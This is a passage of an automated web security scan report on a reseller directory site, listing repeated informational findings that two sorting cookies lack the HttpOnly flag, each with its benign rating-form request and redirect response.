Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=16&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:13:52 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:13:52 GMT; path=/
Location: /detail/16/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.25. http://www.resellerbase.com/detail/17/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/17/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=17&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:15:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:15:47 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:15:47 GMT; path=/
Location: /detail/17/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.26. http://www.resellerbase.com/detail/18/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/18/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=18&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:11:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:11:45 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:11:45 GMT; path=/
Location: /detail/18/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.27. http://www.resellerbase.com/detail/19/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/19/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=19&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:12:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:12:37 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:12:37 GMT; path=/
Location: /detail/19/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.28. http://www.resellerbase.com/detail/20/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/20/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=20&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:05:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:05:08 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:05:08 GMT; path=/
Location: /detail/20/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.29. http://www.resellerbase.com/detail/22/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/22/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=22&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:10:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:10:06 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:10:06 GMT; path=/
Location: /detail/22/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.30. http://www.resellerbase.com/detail/23/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/23/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=23&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:20:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:20:35 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:20:35 GMT; path=/
Location: /detail/23/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.31. http://www.resellerbase.com/detail/26/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/26/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/sitesinstantly-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=26&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:22:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:22:51 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:22:51 GMT; path=/
Location: /detail/26/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.32. http://www.resellerbase.com/detail/28/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/28/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/nicline-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=28&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:24:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:24:12 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:24:12 GMT; path=/
Location: /detail/28/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.33. http://www.resellerbase.com/detail/29/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/29/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=29&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:04:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:04:26 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:04:26 GMT; path=/
Location: /detail/29/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.34. http://www.resellerbase.com/detail/30/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/30/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=30&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:05:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:05:44 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:05:44 GMT; path=/
Location: /detail/30/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.35. http://www.resellerbase.com/detail/31/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/31/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=31&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:07:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:07:38 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:07:38 GMT; path=/
Location: /detail/31/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.36. http://www.resellerbase.com/detail/32/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/32/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/6-chats-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=32&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:23:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:14 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:14 GMT; path=/
Location: /detail/32/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.37. http://www.resellerbase.com/detail/33/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/33/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=33&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:23:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:24 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:24 GMT; path=/
Location: /detail/33/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.38. http://www.resellerbase.com/detail/34/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/34/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/34/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/vod-cash-com-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=34&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:23:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:33 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:33 GMT; path=/
Location: /detail/34/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.39. http://www.resellerbase.com/detail/35/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/35/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=35&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:08:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:08:16 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:08:16 GMT; path=/
Location: /detail/35/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.40. http://www.resellerbase.com/detail/36/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/36/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/nemproduction-com-german.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=36&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:23:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:57 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:57 GMT; path=/
Location: /detail/36/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.41. http://www.resellerbase.com/detail/37/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/37/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=37&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:21:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:21:24 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:21:24 GMT; path=/
Location: /detail/37/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.42. http://www.resellerbase.com/detail/38/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/38/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=38&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:13:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:13:13 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:13:13 GMT; path=/
Location: /detail/38/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.43. http://www.resellerbase.com/detail/39/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/39/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=39&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:11:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:11:13 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:11:13 GMT; path=/
Location: /detail/39/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.44. http://www.resellerbase.com/detail/4/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/4/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

id=4&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:07:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:07:05 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:07:05 GMT; path=/
Location: /detail/4/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.45. http://www.resellerbase.com/detail/40/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/40/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=40&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:22:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:22:05 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:22:05 GMT; path=/
Location: /detail/40/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.46. http://www.resellerbase.com/detail/41/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/41/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=41&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:09:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:09:29 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:09:29 GMT; path=/
Location: /detail/41/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.47. http://www.resellerbase.com/detail/42/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/42/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=42&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:10:41 GMT
